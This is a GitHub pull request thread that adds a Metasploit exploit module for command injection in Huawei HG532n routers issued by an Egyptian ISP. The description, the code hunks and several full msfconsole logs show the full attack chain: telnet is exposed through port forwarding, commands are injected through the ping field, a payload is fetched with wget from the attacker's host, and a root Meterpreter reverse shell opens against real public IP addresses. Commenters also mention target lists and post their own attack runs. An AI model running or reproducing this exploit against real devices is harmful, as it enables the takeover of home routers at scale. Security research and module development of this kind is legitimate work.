### PR TITLE
Add Huawei HG532n command injection exploit

### PR DESCRIPTION
**Pull request by a-darwish**
The Huawei HG532n routers, shipped by [TE-Data Egypt](https://www.tedata.net/), are vulnerable to a command injection exploit in the ping field of their limited shell interface, leading to a root shell.

TE-Data, the incumbent ISP operator in Egypt, provided this router to customers by default. A 3-day finger-printing network scan shows around __50,000+__ device exploitable in the wild.

Affected hardware/software version strings:
```
  Manufacturer: Huawei Technologies Co., Ltd.
  Product Style: HG532n
  SN: B7J7SB9381703791
  IP: 192.168.1.1
  Hardware Version: HG532EAM1HG530ERRAMVER.B
  Software Version: V100R001C105B016 TEDATA
```

The web interface has two kinds of logins, a limited `user:user` login given to all customers, and an admin mode used by company's technical staff. For machines within the TE-Data network, this web interface is remotely accessible.

The web interface's user mode provides very limited functionality, only WIFI passwords change and NAT port-forwarding. Nonetheless by port forwarding the router's own (filtered) telnet port, it becomes remotely accessible.

Due to the ISP's (encrypted) runtime router configuration at ```/etc/defaultcfg.xml``` though, the telnet daemon does not provide a direct linux shell. Rather a very limited custom shell is provided instead, called the "ATP command line tool". Upon disassembling this user-facing binary, it's discovered that the limited shell has a __hidden__ ping command which falls back to the system own shell (```ping %s > /var/res_ping```). We exploit that through command injection to gain Meterpreter root access:

```
[darwish@Home-PC]$ telnet 41.36.32.88 35000 
Trying 41.36.32.88...
Connected to 41.36.32.88.
Escape character is '^]'.
HG520b> help
Welcome to ATP command line tool.
If any question, please input "?" at the end of command.

HG520b>?
cls 
debug 
ip 
sys 
lan 
help 
save 
? 
exit 

HG520b> debug display cwmp
...
CPE OUI:00E0FC
CPE ProductClass:HG532n
CPE SerialNumber:B7J7SB9390600466
CPE Manufacture:Huawei Technologies Co., Ltd.
CPE ModelName:HG532n

HG520b> ping ?;cat${IFS}/proc/cpuinfo;true
ping: bad address '?'
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 32
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
VCED exceptions		: not available
VCEI exceptions		: not available
Success
ping result:
```

## Verification
Since this is specific to a certain hardware device, please find below PCAP captures (and `msfconsole` log) for two remotely attacked routers -- on different Internet subnets.

[huawei-hg532n-pcap-capture.zip](https://github.com/rapid7/metasploit-framework/files/923784/huawei-hg532n-pcap-capture.zip)

Also kindly check below a screenshot of the exploit + an example run when `VERBOSE` is set to `true`:

router1-exploit
```
$ msfconsole
msf > use exploit/linux/http/huawei_hg532n_cmdinject

msf exploit(huawei_hg532n_cmdinject) > set RHOST 197.38.98.11
RHOST => 197.38.98.11

msf exploit(huawei_hg532n_cmdinject) > set SRVHOST 41.34.32.121
SRVHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set LHOST 41.34.32.121
LHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set VERBOSE true
VERBOSE => true

msf exploit(huawei_hg532n_cmdinject) > exploit
[*] Exploit running as background job.
msf exploit(huawei_hg532n_cmdinject) >
[-] Handler failed to bind to 41.34.32.121:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Validating router's HTTP server (197.38.98.11:80) signature
[+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposted telnet port = 33552
[*] Connecting to just-exposed telnet port 33552
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '����
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hostinig /MDGuEPiUDBRXD
[*] Using URL: http://0.0.0.0:8080/MDGuEPiUDBRXD
[*] Local IP: http://192.168.1.3:8080/MDGuEPiUDBRXD
[*] Runninig command on target: wget -g -v -l /tmp/zjtmztfz -r /MDGuEPiUDBRXD -P8080 41.34.32.121
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/zjtmztfz${IFS}-r${IFS}/MDGuEPiUDBRXD${IFS}-P8080${IFS}41.34.32.121;true'
[*] Received new reply token = 'ping: bad address '?''
[+] HTTP server received request. Sending payload to victim
[*] Received new reply token = 'The IP is [41.34.32.121]'
[*] Received new reply token = 'Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: chmod 777 /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: rm /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Waiting for the payload to connect back ..
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200
[+] Payload connected!
[*] Server stopped.

msf exploit(huawei_hg532n_cmdinject) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.21.5)
Architecture : mips
Meterpreter  : mipsbe/linux
meterpreter >
```

## Style

- [x] `rubocop` clean. This is true except for the comment: ```Assignment Branch Condition size for <method> is too high.```; the mentioned methods cannot be made any shorter.
- [x] `msftidy` clean.
- [x] Documentation attached in pull request `documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md`

### CODE REVIEW

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 1]
```diff
@@ -0,0 +1,550 @@
...
+    print_good "HTTP server received request. Sending payload to victim"
+    send_response(cli, @pl)
+  end
+
+  #
+  # Unfortunately we could not use the `echo' command stager since
+  # the router's busybox echo does not understand the necessary
+  # "-en" options. It outputs them to the binary instead.
+  #
+  # We could not also use the `wget' command stager, as Huawei
```
Comment (h00die) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: This is priceless, and should also (and possibly is) captured in the docs.  First suggestion was going to be to use wget stager, but you already captured why it wouldn't work.  Very nice!

**Comment by wwebb-r7** [comment]
I'd suggest maybe moving most of the stuff in the info hash to the docs.   Keep it somewhat along the lines of:

> This module exploits an ABC vulnerability present in  XYZ widgets version 123.  Exploitation of this vulnerability results in remote something something in the security context of whatever-user.  Other brief explanations of stuff that you feel are necessary are ok to put here as well.

Otherwise everything looks good at first glance.  Do you happen to have a firmware image for this device?

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (hunk 1 above)
Comment (a-darwish) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: Thanks a lot 😊😊

What would you suggest as a good place for documenting this; the module's own markdown docs? There are other Huawei-specific options beside the ones used above, so yes it's worth documenting indeed.

P.S. If this is to be merged, in another PR I can modify the [wget stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/wget.rb) to have a new ```opts[:huawei]``` option that produces the huawei-specfic wget parameters. Then in that same new PR we can modify this module to use the new wget stager ;-)

**Comment by a-darwish** [comment]
@wwebb-r7:
> I'd suggest maybe moving most of the stuff in the info hash to the docs ...
> 

Sure, will update the PR now.

> Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Yeah, ```/dev/mtdblock[0123]``` are easily extract-able from all attacked devices. Using [binwalk](https://github.com/devttys0/binwalk) on `mtdblock3` contents also produces a direct squashfs root image. I can send any of those upon request :smiley:

**Comment by wwebb-r7** [comment]
Nice.  Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

**Comment by a-darwish** [comment]
[**@wwebb-r7**](https://github.com/wwebb-r7) commented on [Apr 16, 2017, 11:50 AM GMT+3](https://github.com/rapid7/metasploit-framework/pull/8245#issuecomment-294340968 "2017-04-16T08:50:34Z - Replied by Github Reply Comments"):
> Nice.  Email them to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Ok. I'm preparing a VM now for the r7 team to login into. The ISP blocks port 80 access to the routers for nodes outside the network, so this will be a VM _from within_ where everything should work. Included will also be a long list of targets you can test this module against ;-)

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 2]
```diff
@@ -0,0 +1,550 @@
...
+  # shell when executing a ping:
+  #
+  #       "ping %s > /var/res_ping"
+  #
+  # A succesful injection would thus substitute all its spaces to
+  # ${IFS}, and trails itself with ";true" so it can have its own
+  # IO redirection.
+  #
+  def execute_command(command, error_regex = nil, background: false)
+    print_status "Runninig command on target: #{command}"
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: This looks like a typo.

**Comment by busterb** [comment]
Looks good to me, nice work. We can help make sure that the operator gets the note too.

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (hunk 1 above)
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: I think it's fine to save it for next time.

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 3]
```diff
@@ -0,0 +1,550 @@
...
+      }
+    )
+    fail_with(Failure::Unreachable, "Connection timed out") if res.nil?
+
+    unless res.code == 200
+      fail_with(Failure::NotFound, "Router returned unexpected HTTP code #{res.code}")
+    end
+
+    if res.body.include? valid_port_export_marker
+      print_good "Telnet port forwarding succeeded; exposted telnet port = #{external_telnet_port}"
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: Exposed?

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 4]
```diff
@@ -0,0 +1,550 @@
...
+  def execute_command(command, error_regex = nil, background: false)
+    print_status "Runninig command on target: #{command}"
+
+    command.gsub!(/\s/, '${IFS}')
+    separator = background ? '&' : ';'
+    atp_cmd = "ping ?;#{command}#{separator}true"
+
+    @telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
+    telnet_prompt_wait(error_regex)
+    print_good "Command executed succesfully"
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: Successfully?

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 5]
```diff
@@ -0,0 +1,550 @@
...
+  def start_http_server
+    @pl = generate_payload_exe
+
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
+    resource_uri = '/' + downfile
+
+    if datastore['DOWNHOST']
+      print_status "Will not start local web server, as DOWNHOST is already defined"
+    else
+      print_status("Starting web server; hostinig #{resource_uri}")
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: Hosting?

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 6]
```diff
@@ -0,0 +1,550 @@
...
+    #       -s    Upload
+    #       -v    Verbose
+    #       -l    Local file path
+    #       -r    Remote file path
+    #       -P    Port to be used, optional
+    #
+    wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"
+
+    execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.
+    execute_command("chmod 777 #{output_file}", /No such file/)
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: 700 should be fine, no?

Comment (busterb) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: yeah I presume it should

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (hunk 1 above)
Comment (h00die) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: I would make a section in this module's markdown docs called notes (prob the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in module comments to say something like " see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Every comment shouldn't be converted to the markdown docs but some of the longer more explanatory ones would be better there.

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 7]
```diff
@@ -0,0 +1,550 @@
...
+  # The telnet port is filtered by default. Expose it to the outside world
+  # through NAT forwarding
+  #
+  def expose_telnet_port(session_cookies)
+    cookie = generate_web_cookie(session: session_cookies)
+
+    external_telnet_port = rand(32767) + 32768
+
+    portmapping_page = '/html/application/portmapping.asp'
+    url_append = "?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping&RequestFile=#{portmapping_page}"
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: `vars_get`?

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb [hunk 8]
```diff
@@ -0,0 +1,550 @@
...
+    # Collect existing port-forwarding keys; to be passed to the delete POST request
+    portforward_key = /InternetGatewayDevice\.WANDevice\.1\.WANConnectionDevice\.1\.WANPPPConnection\.1\.PortMapping\.\d+/
+    vars_post = {}
+    res.body.scan(portforward_key).uniq.each do |key|
+      vars_post[key] = ""
+    end
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/html/application/del.cgi?RequestFile=#{portmapping_page}",
```
Comment (wvu-r7) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: `vars_get`?

File: modules/exploits/linux/http/huawei_hg532n_cmdinject.rb (hunk 1 above)
Comment (a-darwish) [inline modules/exploits/linux/http/huawei_hg532n_cmdinject.rb]: @h00die Done. Module info hash and other comments properly abridged. Documentation file expanded (wget details, mips toolchain builds, etc.)

**Comment by busterb** [comment]
## Release Notes

This adds an exploit for Huawei HG532n routers which, as shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface.

**Comment by busterb** [comment]
Thanks @a-darwish , great module and contribution.

**Comment by Boushy** [comment]
[-] Exploit failed: NoMethodError undefined method `match?' for #<String:0x00000003bc3600>
always happen

**Comment by a-darwish** [comment]
@Boushy Update your environment to the required [ruby-2.4 version](https://ruby-doc.org/core-2.4.0/String.html#method-i-match-3F) where the `String.match?` method is defined. A simple ``$ bundle install`` should automatically do that since this is explicitly stated in the repository's [.ruby-version](https://github.com/rapid7/metasploit-framework/blob/master/.ruby-version) file.

P.S. _Merged_ pull requests are not a place for asking for help. Discuss over IRC or open an explicit [Github issue](https://github.com/rapid7/metasploit-framework/issues) ticket for that.

**Comment by wvu-r7** [comment]
Great response, @a-darwish!!

**Comment by abkrenoo** [comment]
I get this >> please help

[-] Handler failed to bind to 156.202.32.45:443:-  -
[*] Started reverse TCP handler on 0.0.0.0:443 
[*] Validating router's HTTP server (156.203.63.170:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[*] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '����
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hosting /EGcNepbLKnzPx
[*] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[*] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[*] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.32.45
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.32.45;true'
[*] Received new reply token = 'ping: bad address '?''
[*] Received new reply token = 'The IP is [156.202.32.45]'
[*] Received new reply token = 'wget: Transfer timeout!


Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Running command on target: chmod 700 /tmp/sshrqizh
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

**Comment by abkrenoo** [comment]
I get this please help

------------
[-] Handler failed to bind to 156.202.xxx.xxx:443:-  -
[*] Started reverse TCP handler on 0.0.0.0:443 
[*] Validating router's HTTP server (156.203.xxx.xxx:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[*] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '����
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hosting /EGcNepbLKnzPx
[*] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[*] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[*] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.xx.xx
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.xxx.xx;true'
[*] Received new reply token = 'ping: bad address '?''
[*] Received new reply token = 'The IP is [156.202.xx.xxx]'
[*] Received new reply token = 'wget: Transfer timeout!


Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Running command on target: chmod 700 /tmp/sshrqizh
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

**Comment by h00die** [comment]
I'm going to take a stab in the dark since you've given us little to go by (like info on the target since you are authorized to test it and all), and haven't show us the options...
First line, can't bind to interface.
However this is a PR, not an issue. If it's a bug post an issue, not here. If you need help learning msf use IRC where people can assist.
Do not reply here.

**Comment by abkrenoo** [comment]
I’m sorry I should have been more clear. the issue is in thsese last few lines
——
Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.
———
the router is HG532n

options :
Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DOWNFILE                          no        Filename to download, (default: random)
   DOWNHOST                          no        Alternative host to request the MIPS payload from
   HttpPassword     user             no        Web-interface username password
   HttpUsername     user             no        Valid web-interface user-mode username
   ListenerTimeout  60               yes       Number of seconds to wait for the exploit to connect back
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST            156.203.5.yy     yes       The target address
   RPORT            80               yes       The target port (TCP)
   SRVHOST          156.202.32.xx    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   TelnetPassword   admin            no        Telnet username password
   TelnetUsername   admin            no        Valid router telnet username
   URIPATH                           no        The URI to use for this exploit (default is random)
   VHOST                             no        HTTP server virtual host


Payload options (linux/mipsbe/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  156.202.32.xx    yes       The listen address
   LPORT  443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux mipsbe Payload

**Comment by wwebb-r7** [comment]
As mentioned by @h00die , this is not the place for module support.  File an issue or see the IRC channel.

**Pull request merged**